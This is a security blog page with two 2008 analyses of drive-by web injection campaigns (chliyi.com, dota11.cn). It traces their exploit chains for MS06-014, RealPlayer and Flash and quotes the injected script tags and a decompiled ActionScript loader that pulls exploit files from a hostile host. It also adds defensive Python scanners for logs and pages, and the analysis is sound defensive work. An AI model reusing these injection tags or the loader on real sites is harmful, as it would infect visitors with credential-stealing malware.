sudosecure.net


Archive for the 'Malicious Domain' Category


Malicious Site Analysis for chliyi.com injection

Posted by jeremy on 29th May 2008

According to my Google searching, chliyi.com has successfully been injected into about 12,000 sites. This malicious domain is using the well-publicized Adobe Flash vulnerability along with a few others. The good news is that Symantec ThreatCon has retracted its declaration of this being a 0-day exploit and has since clarified, with Adobe's help, that the exploit does not work on the newest Flash Player, version 9.0.124.0. The site is not very complex in structure, as the following site map demonstrates:

As you can see, the entry page for this injection is chliyi.com/reg.js, loaded by the following injected tag:

<script src=hxxp://www.chliyi.com/reg.js>

hxxp://www.chliyi.com/reg.js

This file contains no obfuscation, but it does contain some interesting logic, as you can see.

Obviously, if you are using the Chinese language pack you won't receive any of the malicious code, so I would assume the authors want to avoid exploiting Chinese clients. Based on that, I also believe this round of injections was most likely performed by a Chinese organization.

hxxp://www.chliyi.com/img/info.htm

This page is where the obfuscation starts. It also begins the decision tree for choosing which exploits to serve to a user directed to this malicious domain. The first layer of obfuscation is done with VBScript and looks like this:

My first deobfuscation pass revealed even more VBScript obfuscation, which can be seen here:

After the second deobfuscation we see the first branch of the decision tree for choosing which exploits to send to the user's computer. The first test tries to create an Adobe.Stream object with classid clsid:BD96C556-65A3-11D0-983A-00C04FC29E36, which would identify a browser that is possibly susceptible to the MS06-014 vulnerability. If the creation succeeds, the user is directed to the help.htm page; if it fails, the user is sent on to a series of exploits, including the highly publicized Flash Player exploit.

hxxp://www.chliyi.com/img/help.htm

The help.htm file is obfuscated with VBScript as well, but definitely not as heavily. The obfuscated page looked like this:

Deobfuscated, it is very clear which vulnerability the authors are targeting. MS06-014 is an older vulnerability, but it must still have a very good success rate, as a lot of malicious code still targets it. It was only last month that the well-known MPack toolkit stopped including it, so, as everyone has said before me, keep your systems patched to avoid old vulnerabilities like this one being exploited on your systems.

If the exploit is successful, the user downloads the binary hxxp://www.jj120.net/inc/fuckjp.exe. VirusTotal results for it are fair at 22/32 (68.75%) and can be seen here: VirusTotal Results. Running this Trojan in my lab, it grabbed two more files, FLoader.exe and WLoader.exe, which from my analysis are World of Warcraft account credential stealers. Their respective VirusTotal results can be found here: FLoader Results and WLoader.exe Results. Obviously the gaming industry offers something valuable to the site authors. Lately I have started to see a lot more of these types of Trojans, where account information for specific gaming sites is stolen instead of the usual email and bank credentials.

hxxp://www.chliyi.com/img/flash.swf

This is obviously the Flash Player exploit that has been getting so much attention over the last few days. Most other sites using this exploit embed ActionScript that loads a different Flash file, and a different exploit, depending on your browser. For example, most sites serve a separate file for Firefox and for IE, but this one is not as sophisticated and serves only one Flash media file. The swfdump decompile looks like this:

A code extraction attempt using flare showed this:

I am fairly new at deobfuscating Flash files, but what I did notice is that there is no ActionScript associated with the exploit. You can read the security bulletin posted by Adobe for more information, and if you happen to run across the toolkit or actual exploit documentation, feel free to send it my way. ;) Also, here are the VirusTotal results for Flash.swf.

hxxp://www.chliyi.com/img/real.htm

This is another VBScript-obfuscated page, but this time it targets the RealPlayer vulnerability CVE-2007-5601. It is another example of why system administrators need to pay attention to software updates beyond the normal Microsoft Windows and Microsoft Office updates published once a month. Two rounds of VBScript deobfuscation were needed to reveal the actual JavaScript exploit, seen here:

I didn't include the obfuscated code snapshots, as they were very large files with too many lines to capture in screenshots that would display properly in this post. If you need them I can send them your way or post them for download; just ask.

hxxp://www.chliyi.com/img/new.htm

The new.htm file is another attempt at exploiting a known RealPlayer vulnerability (CVE-2008-1309). This deobfuscation took two VBScript decodes to render the following code:

Obviously none of the exploits served up by this malicious domain are 0-days, so if you keep your systems up to date and exercise a little caution when surfing the internet you should be OK. One plugin I highly recommend is NoScript for Firefox, as it will definitely help stop these scripts from executing without your permission. I would also suggest filtering the domain names seen in this analysis, chliyi.com and jj120.net, at the very minimum if you have that capability. Another option is to block the IPs associated with these domains, chliyi.com (218.30.96.87) and jj120.net (61.142.250.221), but this sometimes leads to legitimate sites being blocked, as they could be on a shared host. I checked all the A and CNAME records associated with those IPs and didn't see anything that looked legitimate or popular. I would rather block now and apologize later, but that is definitely not the corporate standard.
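As an added example (not code from the original post), here is a small checker that runs proxy-log lines against the two domains and two IPs named above. The log format and the sample lines are constructed for this example; a domain entry matches the name and any subdomain, while an IP entry only matches requests made directly to that address.

```python
# Added example (not part of the original post): check proxy-log lines against the
# indicators named above, distinguishing domain hits from direct-to-IP hits so that the
# shared-host caveat for IP blocking can be judged per hit.
import ipaddress
from urllib.parse import urlsplit

# Indicators quoted in the analysis: domain -> the IP it resolved to at the time.
BLOCKED_DOMAINS = {"chliyi.com": "218.30.96.87", "jj120.net": "61.142.250.221"}
BLOCKED_IPS = {ip: dom for dom, ip in BLOCKED_DOMAINS.items()}

# Constructed sample log, one request per line: "<epoch> <client> <method> <url> <status>".
SAMPLE_LOG = """\
1211990001 10.0.0.5 GET http://www.example.org/index.html 200
1211990002 10.0.0.5 GET http://www.chliyi.com/reg.js 200
1211990003 10.0.0.5 GET http://www.chliyi.com/img/info.htm 200
1211990004 10.0.0.5 GET http://218.30.96.87/img/help.htm 200
1211990005 10.0.0.7 GET http://www.jj120.net/inc/fuckjp.exe 200
1211990006 10.0.0.9 GET http://notchliyi.com/ 200
1211990007 10.0.0.9 GET http://61.142.250.221/ 404
"""


def host_matches(host):
    """Return (indicator, kind) if host is a blocked domain/subdomain or IP, else None."""
    host = host.lower().rstrip(".")
    try:
        ipaddress.ip_address(host)          # raises ValueError for hostnames
    except ValueError:
        for domain in BLOCKED_DOMAINS:      # exact match or a subdomain of it
            if host == domain or host.endswith("." + domain):
                return (domain, "domain")
        return None
    return (host, "ip") if host in BLOCKED_IPS else None


def scan_log(text):
    """Return one dict per request whose host matches an indicator."""
    hits = []
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue                        # skip malformed lines instead of crashing
        client, url = parts[1], parts[3]
        match = host_matches(urlsplit(url).hostname or "")
        if match:
            indicator, kind = match
            hits.append({"client": client, "url": url, "indicator": indicator, "kind": kind})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(f"{hit['client']} -> {hit['url']}  [{hit['kind']}: {hit['indicator']}]")
```

A "domain" hit shows the client resolved the hostile name; an "ip" hit, like the two direct-to-address requests in the sample, is what a name-only filter would miss, and it is also the kind of block that can catch a shared host.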

I also wasn't surprised at all to see who the registrars for these two hostile domains were, as they seem to be very popular with the malware-writing community lately.

Domain Name: CHLIYI.COM
Registrar: BEIJING INNOVATIVE LINKAGE TECHNOLOGY LTD. DBA DNS.COM.CN
Whois Server: whois.dns.com.cn
Referral URL: http://www.dns.com.cn
Name Server: DNS21.HICHINA.COM
Name Server: DNS22.HICHINA.COM
Status: ok
Updated Date: 24-jan-2008
Creation Date: 12-jun-2003
Expiration Date: 12-jun-2008

Domain Name: JJ120.NET
Registrar: XIN NET TECHNOLOGY CORPORATION
Whois Server: whois.paycenter.com.cn
Referral URL: http://www.xinnet.com
Name Server: NS1.72DNS.COM
Name Server: NS2.72DNS.COM
Status: clientDeleteProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 09-mar-2008
Creation Date: 07-mar-2006
Expiration Date: 07-mar-2009

As always if you have any questions or comments feel free to contact me or leave them here.

Posted in Malicious Domain

Malicious Site Analysis for dota11.cn injection

Posted by jeremy on 27th May 2008

SQL and XSS site injections have become a standard way of spreading malicious code and binaries lately. This is my analysis of the dota11.cn injection that occurred just recently. My goal in this analysis is to provide a visual picture of how these types of injections work and the methodology behind them. First, here is a site map of the current dota11.cn injection:

As you can see from the site map, these types of injections serve as gateways to a much larger scheme of user tracking, malicious code, and exploit-serving web pages and scripts. Now let me attempt to walk you through the logic of this scheme.

hxxp://www.dota11.cn/m.js

This is the entry page for this injection. The following is the actual code injected into a vulnerable web site:

<script src=hxxp://www.dota11.cn/m.js>

A simple script src= tag will automatically include the malicious code from the above URL, which is why it is injected into the vulnerable web site in the first place. The m.js file contains a simple piece of JavaScript that unobtrusively redirects you to a statistics-gathering server, which lets the designer of this scheme track users, system configurations, and traffic flows as you are involuntarily redirected through this maze of hostile content. The statistics-gathering server is located at web.51.la/go.asp. The next portion of m.js contains simple logic that renders one of two iframe redirections depending on your browser's language settings. If you have the Chinese language pack configured you will be directed to windows.loveyoushipin.com/ing/le.htm; if you don't, you will be directed to www.dota11.cn/dj.htm. The last portion of the m.js script directs you, via an iframe, to www.woai117.cn/123.htm. You can view the original m.js source code here in PDF format: M.js Source Code.
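Both injections on this page (reg.js above and m.js here) land in a victim page as a single unquoted script src= tag, often followed by hidden iframes to the next hop. As an added example that is not code from either post, the scanner below pulls every script and iframe source out of a captured page, drops same-site includes, and flags the rest against the domains named in these two analyses. The sample page and the site hostname shop.test are constructed for the example.

```python
# Added example (not from the original posts): find third-party <script>/<iframe> includes
# in a captured page and flag the ones pointing at the domains named in these analyses.
# The page and the site hostname below are constructed for the example.
from html.parser import HTMLParser
from urllib.parse import urlsplit

# Domains called out in the two posts on this page.
HOSTILE_DOMAINS = ("dota11.cn", "woai117.cn", "loveyoushipin.com", "chliyi.com", "jj120.net")

# Constructed page: an unquoted src= injection appended after </html>, the way the
# injected "<script src=...>" fragment lands in database-driven pages, plus a hidden iframe.
SAMPLE_HTML = """<html><head><script src="/js/site.js"></script></head>
<body><p>Welcome</p><script src=//cdn.shop.test/a.js></script>
<iframe src="http://www.woai117.cn/123.htm" width=0 height=0></iframe>
</body></html><script src=http://www.dota11.cn/m.js></script>"""


class IncludeScanner(HTMLParser):
    """Collect every script/iframe src; HTMLParser accepts unquoted attribute values."""
    def __init__(self):
        super().__init__()
        self.includes = []

    def handle_starttag(self, tag, attrs):
        if tag in ("script", "iframe"):
            for name, value in attrs:
                if name == "src" and value:
                    self.includes.append((tag, value))


def in_domain(host, domain):
    return host == domain or host.endswith("." + domain)


def find_injections(html, site_host):
    """Return third-party includes, marking those on a known hostile domain."""
    scanner = IncludeScanner()
    scanner.feed(html)
    scanner.close()
    findings = []
    for tag, url in scanner.includes:
        host = (urlsplit(url).hostname or "").lower()
        if not host or in_domain(host, site_host):
            continue        # relative or same-site include: not an injected third party
        known = any(in_domain(host, d) for d in HOSTILE_DOMAINS)
        findings.append({"tag": tag, "url": url, "host": host,
                         "verdict": "known-hostile" if known else "third-party"})
    return findings


if __name__ == "__main__":
    for f in find_injections(SAMPLE_HTML, "shop.test"):
        print(f"{f['verdict']:13} <{f['tag']} src={f['url']}>")
```

Unknown third-party includes are reported too, since the next injection campaign will use a domain that is not on anyone's list yet.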

hxxp://windows.loveyoushipin.com/ing/le.htm

You will only receive this iframe redirection if your browser is configured to use the Chinese language pack. The le.htm file will attempt to serve a RealPlayer exploit (CVE-2007-5601); more information on this vulnerability can be found here: Vulnerability Summary CVE-2007-5601. The other portion of this script covertly redirects you to a short JavaScript file at hxxp://js.users.51.la/1662569.js, the configuration-gathering script that submits your information to the statistics web server at vip2.51.la/go.asp. Strategically placing these statistics-gathering scripts allows the malicious site designer to track the logic flows and exploit attempts and gauge how successful his or her design is. You can view the original le.htm and 1662569.js source code here in PDF format: 1662569_js Source Code and le_htm Source Code.

hxxp://www.dota11.cn/dj.htm

You will receive this iframe redirection if your browser is not configured to use the Chinese language pack. This file appears to be the most complex piece of this malicious scheme, with several logically chosen exploits being served up, and it is obfuscated to prevent detection and deter analysis. The first attempt at serving malicious content targets an old vulnerability in the Microsoft Data Access Components (MDAC) function (MS06-014). If your configuration doesn't throw an error on creation of the Adobe.Stream object, you are iframe-redirected to hxxp://www.dota11.cn/14.htm, where the malicious binary bak.exe is downloaded to your computer from hxxp://www.woai117.cn/bak.exe by exploiting the MDAC vulnerability. If your configuration throws an error, a RealPlayer vulnerability is probed for instead; here is the vulnerability summary: CVE-2007-5601, the same vulnerability seen in the le.htm file earlier. If this probe does not throw an error, you are redirected to hxxp://www.dota11.cn/rl.htm, where an exploit for that vulnerability is attempted. If the RealPlayer probe fails and throws an error, you are iframe-redirected to hxxp://www.dota11.cn/new.htm, where you receive another attempt at exploiting a more recent RealPlayer vulnerability (CVE-2008-1309). You are also redirected to hxxp://www.dota11.cn/04.htm, which looks like a leftover iframe reference the designer forgot to clean up; I say this because I received a 404 error when I tried to grab the file. The last iframe redirection occurs no matter what the above logic dictated and leads you to hxxp://www.dota11.cn/123.htm. Here is the source code for the files mentioned in this paragraph: dj_htm Source Code, 14_htm Source Code, rl_htm Source Code, and new_htm Source Code. The decoded version of dj.htm can be seen here: dj_htm_decoded Source Code. VirusTotal bak.exe Results.

hxxp://www.dota11.cn/123.htm and hxxp://www.woai117.cn/123.htm

These two files, although hosted on separate domains, contain exactly the same content. Both serve malicious Flash media files. If you're using Internet Explorer you will receive this file: hxxp://www.woai117.cn/4561.swf, and all other browsers receive this one: hxxp://www.woai117.cn/4562.swf. Both use embedded ActionScript logic to redirect you to a further malicious Flash file based on your Flash Player version. For Internet Explorer users the redirect looks like hxxp://www.woai117.cn/ + fVersion + i.swf, and for all others it looks like hxxp://www.woai117.cn/ + fVersion + f.swf. The following excerpt is from the ActionScript being used:

movie '4561.swf' {
// flash 8, total frames: 1, frame rate: 12 fps, 550x400 px, compressed
frame 1 {
var fVersion = /:$version;
loadMovie('hxxp://www.woai117.cn/' + fVersion + 'i.swf', _root);
stop();
}
}

This looks like the same vulnerability SANS.org is referencing in Adobe Flash Player Vuln and Malicious swf files.

If you have any questions or comments regarding this post, as always, feel free to contact me. I hope you enjoyed the change from the usual Storm Worm coverage. Thanks for visiting.

Posted in Malicious Domain